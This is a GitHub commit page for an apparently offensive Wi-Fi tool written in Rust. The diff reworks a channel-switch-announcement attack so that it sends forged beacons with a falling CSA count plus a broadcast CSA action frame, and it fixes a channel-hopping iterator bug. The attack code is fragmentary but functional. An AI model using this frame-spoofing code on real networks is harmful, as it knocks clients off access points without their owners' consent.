Skip to content

Commit

Permalink
Fix channel locking skipping first channel after hop; fixed CSA to ma…
Browse files Browse the repository at this point in the history 
…ke more sense on the wire.
  • Loading branch information
@Ragnt
Ragnt committed Aug 15, 2024
1 parent 437ee16 commit 4df32a0
Show file tree
Hide file tree
Showing 3 changed files with 22 additions and 26 deletions.
36 changes: 16 additions & 20 deletions src/attack.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,7 @@ use crate::{
// //
//////////////////////////////////////////////////////////////

pub fn csa_attack(oxide: &mut OxideRuntime, mut beacon: Beacon) -> Result<(), String> {
pub fn csa_attack(oxide: &mut OxideRuntime, beacon: Beacon) -> Result<(), String> {
if oxide.config.disable_csa {
return Ok(());
}
Expand Down Expand Up @@ -74,48 +74,44 @@ pub fn csa_attack(oxide: &mut OxideRuntime, mut beacon: Beacon) -> Result<(), St

// If we are transmitting
if !oxide.config.notx {
let random_client = ap_data
.client_list
.get_random()
.map(|client| client.mac_address);

// Send a CSA action frame to a random client
if let Some(client) = random_client {
let frx = build_csa_action(&client, &ap_data.mac_address, new_channel);
// Send 5 beacons with decreasing counts
for count in (0..6).rev() {
let frx = build_csa_beacon(beacon.clone(), new_channel.into(), count);
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
format!(
"CSA Attack (Action): {} => {} ({}) Channel: {}",
"CSA Attack (Beacon): {} ({}) Channel: {} | Count: {}",
ap_mac,
client,
beacon
.station_info
.ssid
.clone()
.unwrap_or("Hidden".to_string()),
new_channel
new_channel,
count
),
));
}

// Send beacons too
for _ in 0..10 {
let frx = build_csa_beacon(beacon.clone(), new_channel.into());
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
}
let client = MacAddress::broadcast();

ap_data.interactions += 1;
ap_data.auth_sequence.state = 1;
// Send a CSA action frame to broadcast
let frx = build_csa_action(&client, &ap_data.mac_address, new_channel);
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
format!(
"CSA Attack (Beacon*10): {} ({}) Channel: {}",
"CSA Attack (Action): {} => {} ({}) Channel: {}",
ap_mac,
client,
beacon.station_info.ssid.unwrap_or("Hidden".to_string()),
new_channel
),
));

ap_data.interactions += 1;
ap_data.auth_sequence.state = 1;
}

Ok(())
Expand Down
8 changes: 4 additions & 4 deletions src/main.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2857,7 +2857,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
channels_binding
.clone_from(&oxide.if_hardware.hop_channels);
cycle_iter = channels_binding.iter().cycle();
first_channel = *cycle_iter.next().unwrap();
first_channel = *cycle_iter.clone().next().unwrap();
oxide.if_hardware.locked = !oxide.if_hardware.locked;
} else {
// Get target_chans
Expand All @@ -2873,7 +2873,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
channels_binding
.clone_from(&oxide.if_hardware.hop_channels);
cycle_iter = channels_binding.iter().cycle();
first_channel = *cycle_iter.next().unwrap();
first_channel = *cycle_iter.clone().next().unwrap();

oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
Expand Down Expand Up @@ -2901,7 +2901,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
channels_binding
.clone_from(&oxide.if_hardware.hop_channels);
cycle_iter = channels_binding.iter().cycle();
first_channel = *cycle_iter.next().unwrap();
first_channel = *cycle_iter.clone().next().unwrap();

oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
Expand Down Expand Up @@ -2929,7 +2929,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
channels_binding
.clone_from(&oxide.if_hardware.hop_channels);
cycle_iter = channels_binding.iter().cycle();
first_channel = *cycle_iter.next().unwrap();
first_channel = *cycle_iter.clone().next().unwrap();

oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
Expand Down
4 changes: 2 additions & 2 deletions src/tx.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -722,15 +722,15 @@ pub fn build_probe_response(
rth
}

pub fn build_csa_beacon(beacon: Beacon, new_channel: u32) -> Vec<u8> {
pub fn build_csa_beacon(beacon: Beacon, new_channel: u32, count: u8) -> Vec<u8> {
let mut rth: Vec<u8> = RTH_NO_ACK.to_vec();

let mut frx = beacon.clone();
frx.header.sequence_control.sequence_number =
beacon.header.sequence_control.sequence_number + 1;
frx.station_info
.data
.push((37u8, vec![0u8, new_channel.try_into().unwrap(), 3u8]));
.push((37u8, vec![0u8, new_channel.try_into().unwrap(), count]));

rth.extend(frx.encode());
rth
Expand Down

0 comments on commit 4df32a0

Please sign in to comment.